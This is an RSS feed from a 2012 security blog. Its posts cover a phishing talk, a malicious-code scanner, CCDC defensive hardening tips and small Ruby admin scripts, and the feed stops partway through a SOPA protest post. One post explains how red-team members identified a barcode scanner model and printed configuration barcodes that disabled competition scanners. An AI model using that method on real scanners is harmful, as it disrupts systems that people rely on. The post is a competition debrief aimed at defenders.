<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Digital Offensive</title>
	<atom:link href="http://www.digitaloffensive.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.digitaloffensive.com</link>
	<description>Take an offensive approach to Security know what your foes know!</description>
	<lastBuildDate>Tue, 01 May 2012 17:56:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Phishing Attacks and Defense</title>
		<link>http://www.digitaloffensive.com/2012/05/phishing-attacks-and-defense/</link>
		<comments>http://www.digitaloffensive.com/2012/05/phishing-attacks-and-defense/#comments</comments>
		<pubDate>Tue, 01 May 2012 17:56:05 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=395</guid>
		<description><![CDATA[Phishing Attacks and Defense Recently I was able to speak at the PA Hackers first meet up (http://www.pahackers.com). My topic for this meet up was Phishing Attacks and Defense. I even went as far as to provide a live demo using the SET (Social Engineering Toolkit). The talk had some bugs due to technical issues, [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Phishing Attacks and Defense</strong></p>
<p>Recently I was able to speak at the PA Hackers first meet up (<a href="http://www.pahackers.com/">http://www.pahackers.com</a>). My topic for this meet up was Phishing Attacks and Defense. I even went as far as to provide a live demo using the SET (Social Engineering Toolkit). The talk had some bugs due to technical issues, but we made it through and the audience enjoyed it. To see the slides from my talk click this link. <a href="http://www.digitaloffensive.com/wp-content/uploads/2012/05/FINAL-VERSION.pptx">FINAL-VERSION</a></p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F05%2Fphishing-attacks-and-defense%2F&amp;title=Phishing%20Attacks%20and%20Defense" id="wpa2a_2"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/05/phishing-attacks-and-defense/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>iScan 2.0 beta! Detecting malicious code in webpages</title>
		<link>http://www.digitaloffensive.com/2012/04/iscan-2-0-beta-detecting-malicious-code-in-webpages/</link>
		<comments>http://www.digitaloffensive.com/2012/04/iscan-2-0-beta-detecting-malicious-code-in-webpages/#comments</comments>
		<pubDate>Tue, 10 Apr 2012 18:43:01 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=391</guid>
		<description><![CDATA[Back in the spring of 2011 I wrote an addon script to the application iScanner to help automate the process of checking a full website and not just individual pages.  Though over time the ruby programing language has grown and changed a lot to the point that the gems my old script relied on are [...]]]></description>
			<content:encoded><![CDATA[<p>Back in the spring of 2011 I wrote an addon script to the application iScanner to help automate the process of checking a full website and not just individual pages.  Though over time the ruby programing language has grown and changed a lot to the point that the gems my old script relied on are no longer useable in newer version of ruby.</p>
<p>If it wasn’t for Karen Carter and her research project on iScanner and iScan I would probably never even know there was an issue as I have not visited this code in some time like most things I post about. It is not that I was no longer interested in adding to it or learning how to detect malicious codes in site it was just a matter of time. She contacted me via the site and explained she had an issue using iScan after reviewing her error and reproducing it, I found the issue that I stated above. The recent ruby upgrades made the gem I was using no longer useable.</p>
<p>Though I was not able to rewrite the full code for Karen prior to her presentation I have been able to write a 2.0 beta using faster crawling and scanning. However in the beta reporting is still not great. All results are saved to results.txt and you can use that file to reference the infected files reports and site scan reports, once done make sure to clean up to save space.</p>
<p>To use the new code you will need ruby and the anemone gem installed. Once you have those items you can run the program by typing ruby iscan.rb. You will be prompted for the domain to crawl. Enter the domain and hit enter.</p>
<p>To download the iScan 2.0 beta go to: <a title="http://www.digitaloffensive.com/files/iscan2.rb" href="http://www.digitaloffensive.com/files/iscan2.rb" target="_blank">http://www.digitaloffensive.com/files/iscan2.rb</a></p>
<p>To read my original write up on this subject go to: <a title="http://www.digitaloffensive.com/2011/03/detecting-malicious-code-in-webpages-iscanner-and-iscan-script/" href="http://www.digitaloffensive.com/2011/03/detecting-malicious-code-in-webpages-iscanner-and-iscan-script/" target="_blank">http://www.digitaloffensive.com/2011/03/detecting-malicious-code-in-webpages-iscanner-and-iscan-script/</a></p>
<p>To learn more about iScanner go to: <a href="http://iscanner.isecur1ty.org/">http://iscanner.isecur1ty.org/</a></p>
<p>To see Karen’s well detailed and educational video on how to use iScanner and iScan go to: <a title="This external link will open in a new window" href="http://youtu.be/gxslbpS0R2k" target="_blank">http://youtu.be/gxslbpS0R2k</a></p>
<p>Any questions or concerns feel free to post them below.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F04%2Fiscan-2-0-beta-detecting-malicious-code-in-webpages%2F&amp;title=iScan%202.0%20beta%21%20Detecting%20malicious%20code%20in%20webpages" id="wpa2a_4"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/04/iscan-2-0-beta-detecting-malicious-code-in-webpages/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>#CCDC the First Hour</title>
		<link>http://www.digitaloffensive.com/2012/03/ccdc-the-first-hour/</link>
		<comments>http://www.digitaloffensive.com/2012/03/ccdc-the-first-hour/#comments</comments>
		<pubDate>Tue, 27 Mar 2012 02:57:15 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[CCDC]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=389</guid>
		<description><![CDATA[CCDC the First Hour Despite some popular beliefs the Blue Cell are not provide machines that already been back doored for the Red Cell to use. The machines that you are giving are definitely built in an insecure method but that’s it. Your object coming into this event is usually the same year after year. [...]]]></description>
			<content:encoded><![CDATA[<p><strong>CCDC the First Hour</strong></p>
<p>Despite some popular beliefs the Blue Cell are not provide machines that already been back doored for the Red Cell to use. The machines that you are giving are definitely built in an insecure method but that’s it.</p>
<p>Your object coming into this event is usually the same year after year. XYZ Company fired their incompetent IT staff. Their incompetence will make your next two days a living hell. You are coming into this organization blind, you do not know nor should you trust the current systems or infrastructure. Though you would like to start from the ground up you need to keep business going and repair the damage while defending an onslaught of attacks.</p>
<p>So how do you get the upper hand? Time is of the essence. The Red Cell is very skilled and some can operate almost as fast as an automated program. That being said when the start bell goes most likely within seconds we have several shells on your machines, plus the default credentials of your web apps, firewall and other devices on the network that year. To get the upper hand I personally believe you need to accomplish this at the network layer as well as working as a team. You need to lock down the firewall as quickly as possible to buy yourself time to CLEAN and remove malicious software, patch systems to avoid re-infection, change your passwords to avoid access, assure there are no new accounts that have been added, trace cables to assure there are no rouge devices and to implement your CCDC game plan.</p>
<p>During this time it is important to remain calm and professional. Remember this is only a game at the end of the day. Though acting in an unprofessional manner will cast a shadow over yourself and school especially since there are many recruiters in the audience watching how you act and respond. These are the people you will be working for if you survive this event and decide that a career in information security is for you.</p>
<p>So how do you lock down your firewall? I am not a CISCO expert by any means though I have had my fair share of time on these devices both in previous jobs and at the CCDC.  First I suggest that if your team has a budget that you look at investing in a CISCO ASA 505 for your schools lab so you can train on it. This is not only good for the competition but is a great training aide as you get ready to enter into the real world, you can say you have CISCO ASA experience. You can find them for a few hundred dollars or less on: <a href="http://www.ebay.com/sch/?_nkw=cisco%20asa%205505&amp;clk_rvr_id=326713534867">http://www.ebay.com/sch/?_nkw=cisco%20asa%205505&amp;clk_rvr_id=326713534867</a> . Second I suggest you do some reading: <a href="http://www.cisco.com/en/US/docs/security/asa/quick_start/5505/5505-poster.html">http://www.cisco.com/en/US/docs/security/asa/quick_start/5505/5505-poster.html</a> , you have several months to the next CCDC qualifier.</p>
<p>These devices have to main ways to administrate them. The first is through the ASDM software and the second is through command line. The device during the competition is already configured for you saving you a lot of time, but also making you very vulnerable.</p>
<ol>
<li>Change the default password</li>
<li>Save the changes to the flash and save &lt;= the same as a wr mem at command line. Saving itself will not keep the changes unless you reboot. Saving the changes to the memory will apply instantly avoiding cisco/cisco being used even if you changed the password.</li>
<li>Disable remote administration of your firewall on the outside interface. If the TRUE scorebot needs ssh access then limit it by the TRUE scorebots IP.</li>
<li>Disable any any IP allow and create a policy above it that only allows the ports you need. Make sure you know your basic port numbers
<ol>
<li>80 =&gt; http</li>
<li>443 =&gt; https</li>
<li>21 =&gt; ftp</li>
<li>22 =&gt; ssh</li>
<li>ICMP =&gt; protocol not port</li>
<li>Make sure logging is enabled on your rules and the time on your firewall is correct. This is very important in your incident write ups to show logs and have the time match up. Limited time drift in logs are permissible in court but large discrepancies will be thrown out.</li>
<li>Save your changes to running memory and save.</li>
</ol>
</li>
</ol>
<p>In the event you are not allowed to block IP addresses without cause nor can you block large ranges of IP addresses. So how do you get the permission to set a block? In the real world this is called a business need. For example:</p>
<p>“Dear Mr.Ceo;</p>
<p>During a recent firewall audit the IT Security department has found that several questionable configurations on the firewall that were left there from the previous IT team. These configurations are opening the organization to undue risk by allowing remote administration of the firewall to any one on the internet. Though we have set the password to properly secured one this doesn’t guarantee full security and it would be wise to lock this feature down to only our remote offices and internal staff.</p>
<p>Sincerely IT Security department”</p>
<p>So now that you are working on locking down your firewall what should the rest of your team be doing? Well that is simple; you have up to 8 team mates that should be accomplishing other tasks while one maybe two people are working on locking down the firewall. This is one reason why the red cell does so well, we break down into teams and divide and conquer.</p>
<p>So how should you divide your team up? I would do it by skill set and the below:</p>
<p>A person or persons working on changing system passwords: these individuals should know basic windows and Linux user account administration. Think about on the Linux system doing away with passwords all together and requiring the use of ssh keys.</p>
<p>A person or persons working on web applications: Make sure they know where each application is located. Make sure not only the administrator passwords are changed but all user passwords are changed. Think about having these team mates lock down admin directories to only internal IP ranges by using .htacess files or another method.</p>
<p>A person or persons working on identifying and disabling services: Make sure that you know what is running. Verify that what is running is required and if it is not required then disable it. This user should know how to use services.msc on windows and /etc/services in Linux as well as service blank stop or start.</p>
<p>A person or persons working on applying system patches: Have them focus on remotely exploitable patches first then other patches. Since the firewall should be locked down now exploits like smb will not be as high of a risk.</p>
<p>A person or persons tracing wires and securing wireless: Make sure you know what is plugged into your network and where each wire goes into. WEP is not your friend. It sucks when your IT department comes in that night and rewires things for you and adds devices for your job to work better J</p>
<p>A person or persons monitoring connections and logs: this person should be familiar with the tool tcpview, netstat and log reading. They will be the one that should help detect intrusions and gather evidence for the incident response.</p>
<p>A person or persons working on business injects: Even though there is a threat to your environment, business needs to remain running. Make sure it gets done or you will be done.</p>
<p>If you have any additional people that are not physically working on a box have them become the note takers, document what you have done. Or you can make them a gopher to go get coffee or other supplies. The team captain should be this person. They should act as a manager and supervise dictate and control. They are there to execute your teams plan and keep you guys coordinated and motivated.</p>
<p>This may seem like a lot and not able to be accomplished in an hour, but it can. You will need to run in parallel with each other and multitask. If you have questions please feel free to contact me and remember to reach out to the Red Cell members for help and input throughout the year.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F03%2Fccdc-the-first-hour%2F&amp;title=%23CCDC%20the%20First%20Hour" id="wpa2a_6"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/03/ccdc-the-first-hour/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Quick Tips for Linux Security at the CCDC</title>
		<link>http://www.digitaloffensive.com/2012/03/quick-tips-for-linux-security-at-the-ccdc/</link>
		<comments>http://www.digitaloffensive.com/2012/03/quick-tips-for-linux-security-at-the-ccdc/#comments</comments>
		<pubDate>Thu, 22 Mar 2012 00:48:18 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[CCDC]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=386</guid>
		<description><![CDATA[Quick Tips for Linux Security at the CCDC This guide is to be high level and provide a reference for the CCDC Blue Cell to use to help secure their Linux boxes during the CCDC events. This being said this document does not guarantee your victory. My understanding is during the contest tools can be [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Quick Tips for Linux Security at the CCDC</strong></p>
<p>This guide is to be high level and provide a reference for the CCDC Blue Cell to use to help secure their Linux boxes during the CCDC events. This being said this document does not guarantee your victory.</p>
<p>My understanding is during the contest tools can be downloaded if the tools are free for commercial use. With that being said I will base some of my suggestions on that. Remember time is important. We are already on your box. Also my thoughts may be different than other red cell members.</p>
<p><span id="more-386"></span></p>
<p><strong>Before the event</strong></p>
<ol>
<li>Study this: <a href="http://www.sans.org/score/checklists/ID_Linux.pdf">http://www.sans.org/score/checklists/ID_Linux.pdf</a></li>
<li>Learn Linux basic administration and file editing.</li>
</ol>
<p><strong>Remote and Local Administration Security</strong></p>
<ol>
<li>Logon to the console: service sshd stop</li>
<li> Change root password</li>
<li>Disable root login in the sshd.conf</li>
<li>Remove any keys that exist in .ssh</li>
<li>Create new keys</li>
<li>Disable password login and use keys in the sshd.conf</li>
<li>Install apf firewall : <a href="http://www.rfxn.com/projects/advanced-policy-firewall/">http://www.rfxn.com/projects/advanced-policy-firewall/</a> or learn Iptables</li>
<li>Edit the configuration lines for ingress and egress ports, don’t forget protocols as well so ping works.</li>
<li>Install BFD: <a href="http://www.rfxn.com/projects/brute-force-detection/">http://www.rfxn.com/projects/brute-force-detection/</a></li>
<li>Edit the configuration files and start apf and bfd</li>
<li>Start sshd backup</li>
<li>Verify before disconnecting your keys work.</li>
<li>Change keys often.</li>
<li>Know what users belong on the system and which had been added.</li>
<li>Last command to see who logged on to your box last and from where also w to see who is on now and from where. Unknown IP’s are an incident.</li>
<li>Look for hidden directories mkdir “…” &lt;= Bad</li>
<li>Set none root users to a jailed shell so they can’t run anything.</li>
</ol>
<p><strong>Database Security:</strong></p>
<ol>
<li>Change or add a password for mysql or postgres . Warning may damage some of the web apps depending how they were installed.</li>
</ol>
<p><strong>Web Security:</strong></p>
<ol>
<li>Use ModSecurity for your web apps</li>
<li>Use .htaccess files to restrict the admin sections of your web app to local IP addresses.</li>
<li>Change default passwords</li>
<li>Lock down access to phpmyadmin, no need for outside access to it.</li>
<li>Lock down webdav, no need for that.</li>
<li>Cat /var/log/http/access.log and error_log to look for web hacking attempts and who tried them.</li>
</ol>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F03%2Fquick-tips-for-linux-security-at-the-ccdc%2F&amp;title=Quick%20Tips%20for%20Linux%20Security%20at%20the%20CCDC" id="wpa2a_8"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/03/quick-tips-for-linux-security-at-the-ccdc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>#MACCDC12 Barcode Scanner Hack</title>
		<link>http://www.digitaloffensive.com/2012/03/maccdc12-barcode-scanner-hack/</link>
		<comments>http://www.digitaloffensive.com/2012/03/maccdc12-barcode-scanner-hack/#comments</comments>
		<pubDate>Tue, 20 Mar 2012 17:55:49 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=382</guid>
		<description><![CDATA[Mid Atlantic CCDC Barcode Scanner Hack: How many of you would of even thought that the scanner on the med station was actually hackable itself?  Before Brad and I went around hacking them with a simple piece of paper that left them unusable until reprogrammed with another sheet of paper that I gave to the [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Mid Atlantic CCDC Barcode Scanner Hack:</strong></p>
<p>How many of you would of even thought that the scanner on the med station was actually hackable itself?  Before Brad and I went around hacking them with a simple piece of paper that left them unusable until reprogrammed with another sheet of paper that I gave to the white cell. How many of you were able to figure out how to fix them by researching the product and not going right to the white cell or Larry and Darren?</p>
<p>Up to this event I never really thought about how insecure barcodes were and never really thought how readily available they are for duplicating and circumventing security measures as well as possibly injecting attacks into other systems.</p>
<p>Check these YouTube videos for more on their dangers:</p>
<p><a href="http://www.youtube.com/watch?v=cEDqdYBtpvg">http://www.youtube.com/watch?v=cEDqdYBtpvg</a> &lt;= Three part video of a talk done on barcode hacking at Defcon. This gave me the idea for the attack at the CCDC.</p>
<p>While sitting at my office the day before the CCDC I was watching the twitter trend and notice someone uploaded a picture of the med station and you could see the scanner. I saved the picture and removed everything else out of the picture using gimp except the scanner. I then used the Google Goggles application on my android phone to take a picture of it and to have it tell me what model it was and who made it. In the first several links Google returned I found that it was a Honeywell barcode scanner model MetroSelect. Knowing this and having a few ideas of an attack based on the You Tube video above, I searched Honeywell site for the configuration guide that will provide the codes to configure the scanner. The guide can be found here: <a href="http://www.honeywellaidc.com/CatalogDocuments/00-02544%20Rev%20K%202-11.pdf">http://www.honeywellaidc.com/CatalogDocuments/00-02544%20Rev%20K%202-11.pdf</a> . Side note once I got to MD, I found that we had our own med station and was able to confirm the model was correct as well. But the above gave me the ability to start my research and was actually 100% accurate.</p>
<p>The guide has over 116 pages of information and codes on how to configure the scanners. We used the information found on page 1-2. We made a quick disable print out and a quick enable print out. These codes allowed us to stop your scanners from scanning your badges until they were re-enabled. Though as you all know that was probably the least of your med station problems. Such as the Christmas incident, lock removal, lock additions, wifi attacks and so on.</p>
<p>Hopefully you find the info above informative and it gives you an idea how we think and plan some attacks.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F03%2Fmaccdc12-barcode-scanner-hack%2F&amp;title=%23MACCDC12%20Barcode%20Scanner%20Hack" id="wpa2a_10"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/03/maccdc12-barcode-scanner-hack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to create nodes in a Checkpoint firewall from a CSV</title>
		<link>http://www.digitaloffensive.com/2012/03/how-to-create-nodes-in-a-checkpoint-firewall-from-a-csv/</link>
		<comments>http://www.digitaloffensive.com/2012/03/how-to-create-nodes-in-a-checkpoint-firewall-from-a-csv/#comments</comments>
		<pubDate>Tue, 20 Mar 2012 15:00:47 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=380</guid>
		<description><![CDATA[How to create nodes in a Checkpoint firewall from a CSV Have you ever needed to create 100’s if not thousands of new firewall nodes or networks in your Checkpoint firewall? If so you know how tedious of a task this is and you may have even researched means to do this faster. Research shows [...]]]></description>
			<content:encoded><![CDATA[<p><strong>How to create nodes in a Checkpoint firewall from a CSV</strong></p>
<p>Have you ever needed to create 100’s if not thousands of new firewall nodes or networks in your Checkpoint firewall? If so you know how tedious of a task this is and you may have even researched means to do this faster.</p>
<p>Research shows there are two tools to do this, the first tool being “dbedit” and it comes on your management server and the second being a toolkit called “Ofiller and Odumper” by Martin Hoz. The latter is no longer being developed but seems to still work on the newer 7.0 code and first one is pretty complex but easy to learn.</p>
<p>Though Ofiller and Odumper have many features and still works, I have an uneasiness using a tool on my enterprise firewalls that is no longer being developed. So to accomplish my task at hand I used dbedit and a ruby script I wrote to create a dbedit import configuration file from the CSV file of IP’s and names. To learn more about dbedit or to find the syntax for dbedit check the following URL: <a href="http://downloads.checkpoint.com/dc/download.htm?ID=5518">http://downloads.checkpoint.com/dc/download.htm?ID=5518</a> .</p>
<p>In my problem I had over 100 + nodes that needed to be created and added to a group. The CSV file I had listed the IP and the Name of the facility. Now I just had to go line by line taking column 1 input and setting that as the IP and column two input as the node name. To do this I wrote the following script:</p>
<p><a href="../files/rbcpgen.rb">http://www.digitaloffensive.com/files/rbcpgen.rb</a></p>
<p>This script is great for understanding how the process works and with a few tweaks it can be used on your Checkpoint Firewall as well. The script is to be run on any Linux or Windows box that supports ruby. The import that is created needs to be moved to the management server of your Checkpoint firewalls by either SCP or copying and pasting the contents of the import into a new file on the management server.  Once the file is on your management server make sure you are in expert mode and issue the following command:</p>
<p>dbedit -f file_name –s localhost –u admin_username and then press enter and enter the password.</p>
<p>Before you do this make sure that your CSV file does not have any duplicates before running the script. I know I should of added it in, but this was a last minute rush job for work. Also make sure you have a backup of your database in case something breaks. You use this script at your own risk.</p>
<p>If you have any questions or concerns please feel free to contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F03%2Fhow-to-create-nodes-in-a-checkpoint-firewall-from-a-csv%2F&amp;title=How%20to%20create%20nodes%20in%20a%20Checkpoint%20firewall%20from%20a%20CSV" id="wpa2a_12"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/03/how-to-create-nodes-in-a-checkpoint-firewall-from-a-csv/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SANS GCIH Study Guide</title>
		<link>http://www.digitaloffensive.com/2012/03/sans-gcih-study-guide/</link>
		<comments>http://www.digitaloffensive.com/2012/03/sans-gcih-study-guide/#comments</comments>
		<pubDate>Thu, 15 Mar 2012 14:18:47 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=376</guid>
		<description><![CDATA[Last February I had to study and re-certify for my SANS GCIH certification. The first time I took this test had been 4 years earlier after attending a SANS boot camp held in Las Vegas. My instructor at the time was Ed Skoudis. I got to say if you ever have the opportunity to take [...]]]></description>
			<content:encoded><![CDATA[<p>Last February I had to study and re-certify for my SANS GCIH certification. The first time I took this test had been 4 years earlier after attending a SANS boot camp held in Las Vegas. My instructor at the time was Ed Skoudis. I got to say if you ever have the opportunity to take this boot camp I strongly suggest attending his. The class was informative and very fun. He kept us fully engaged and we all learned a lot. After the class I took another month to re read the books and make sure I was ready. The first time taking the tests I scored in the low 90&#8242;s.</p>
<p>Now jump forward 4 years. I am at a new job that does not offer training opportunities like this so I can not afford to attend another one of these camps on my own so I decide to just pay for a re-cert attempt. These attempts include the new books for the course. The new books did not change much from the originals and while reading them it all came back to me like riding a bike.</p>
<p>Since the test is open book I was not to worried, but you need to remember open book can be your best friend or worse nightmare as the test is timed. I made sure I knew the information inside and out and to get the most use out of the books I wrote the following study guide. If you decide to use my study guide I suggest that you verify the page numbers in it and update it appropriately for your version of books. The study guide lists the key points in each chapter of the book and provides where more details can be found on that key topic. In the sections on attacks it lists the attacks and defense along with the pages to additional information.</p>
<p>This guide and studying helped me score over 95% on the test this time around.</p>
<p>Download it below</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2012/03/SANS-GCIH-CERTIFICATION-GUIDE-V2.pdf">SANS GCIH CERTIFICATION GUIDE-V2</a></p>
<p>If you found this study guide to be useful and would like to donate something to help keep the site going please do so below:<br />
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="2XNGDZE9HG24U">
<input type="image" src="https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
<img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"><br />
</form>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F03%2Fsans-gcih-study-guide%2F&amp;title=SANS%20GCIH%20Study%20Guide" id="wpa2a_14"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/03/sans-gcih-study-guide/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Ruby: Script to check if an IP is up and get its Hostname</title>
		<link>http://www.digitaloffensive.com/2012/01/ruby-script-to-check-if-an-ip-is-up-and-get-its-hostname/</link>
		<comments>http://www.digitaloffensive.com/2012/01/ruby-script-to-check-if-an-ip-is-up-and-get-its-hostname/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 18:53:39 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=372</guid>
		<description><![CDATA[Ruby: Script to check if an IP is up and get its Hostname This script will go line by through a text file checking to see which IP is up. If the host is not up it will log to the results.csv file as “IP,DOWN,NoName”. If the host is up it will log to the [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Ruby: Script to check if an IP is up and get its Hostname</strong></p>
<p>This script will go line by through a text file checking to see which IP is up. If the host is not up it will log to the results.csv file as “IP,DOWN,NoName”. If the host is up it will log to the results.csv file as “IP,UP,hostname”. Please note that if the authority DNS server does not have an answer for that IP it will log no name and instead will put the IP address again.  This script is very handy on our firewall audits and cleans ups to see what hosts are still needed and which are no longer even turned on any longer.</p>
<p>You will need to have the IP addresses you want to check in a file called IP.txt, unless you edit the script. Make sure you put the file in the same path as the script.</p>
<blockquote><p>#!/usr/bin/ruby<br />
require &#8220;socket&#8221;<br />
require &#8216;resolv&#8217;</p>
<p>def computer_exists?(fwip)<br />
system(&#8220;ping -c1 -w1 #{fwip}&#8221;)<br />
end</p>
<p>def append_to_file(line)<br />
file = File.open(&#8220;results.csv&#8221;, &#8220;a&#8221;)<br />
file.puts(line)<br />
file.close<br />
end</p>
<p>def getInfo(current_ip)<br />
begin<br />
if computer_exists?(current_ip)<br />
host_name = Socket.getaddrinfo(current_ip,nil)<br />
append_to_file(&#8220;#{current_ip},UP,#{host_name[0][2]}\n&#8221;)<br />
else<br />
append_to_file(&#8220;#{current_ip},DOWN,NoNAME\n&#8221;)<br />
end<br />
rescue SocketError =&gt; mySocketError<br />
append_to_file(&#8220;#{current_ip},UP,ERROR&#8221;)<br />
end<br />
end</p>
<p>#Myfavorite method, read and process file<br />
ipLST=&#8217;IP.txt&#8217;<br />
File.readlines(ipLST).each do |line|<br />
current_ip = &#8220;#{line}&#8221;<br />
getInfo(current_ip)<br />
end</p></blockquote>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2012%2F01%2Fruby-script-to-check-if-an-ip-is-up-and-get-its-hostname%2F&amp;title=Ruby%3A%20Script%20to%20check%20if%20an%20IP%20is%20up%20and%20get%20its%20Hostname" id="wpa2a_16"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2012/01/ruby-script-to-check-if-an-ip-is-up-and-get-its-hostname/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>#SOPABlackout #StopSOPA #StopPIPA</title>
		<link>http://www.digitaloffensive.com/2012/01/sopablackout-stop-sopa-stop-pipa/</link>
		<comments>http://www.digitaloffensive.com/2012/01/sopablackout-stop-sopa-stop-pipa/#comments</comments>
		<pubDate>Wed, 18 Jan 2012 14:16:40 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Blog]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=367</guid>
		<description><![CDATA[Today is January 18th 2012. This is an important date in history as today is the day that thousands of websites are blacking out in protest to two very controversial bills that are written in hast that will censor the internet. At a high level the government plans to use these two bills to legally [...]]]></description>
			<content:encoded><![CDATA[<p>Today is January 18<sup>th</sup> 2012. This is an important date in history as today is the day that thousands of websites are blacking out in protest to two very controversial bills that are written in hast that will censor the internet. At a high level the government plans to use these two bills to legally hijack websites / domains that they deem inappropriate or to be dealing with piracy. They will do this through techniques that can jeopardize your internet security. This will not only affect Americans but everyone as the US has much of the internet infrastructure.</p>
<p>A revised bill putting the burden to protect copyrighted material on the entity is what is required not giving the government the ability to make the decision what to block and what not to block. Our government has more important issues to deal with then doing the legal leg work that these entities should be doing to protect their content.</p>
<p><strong>Watch the video below for more information:</strong></p>
<p><a href="http://www.youtube.com/watch?v=n0X5WCmyokw">http://www.youtube.com/watch?v=n0X5WCmyokw</a></p>
<p><strong>To get more information on the bill from a more reliable source (EEF):  </strong><a href="https://www.eff.org/deeplinks/2012/01/how-pipa-and-sopa-violate-white-house-principles-supporting-free-speech">https://www.eff.org/deeplinks/2012/01/how-pipa-and-sopa-violate-white-house-principles-supporting-free-speech</a></p>
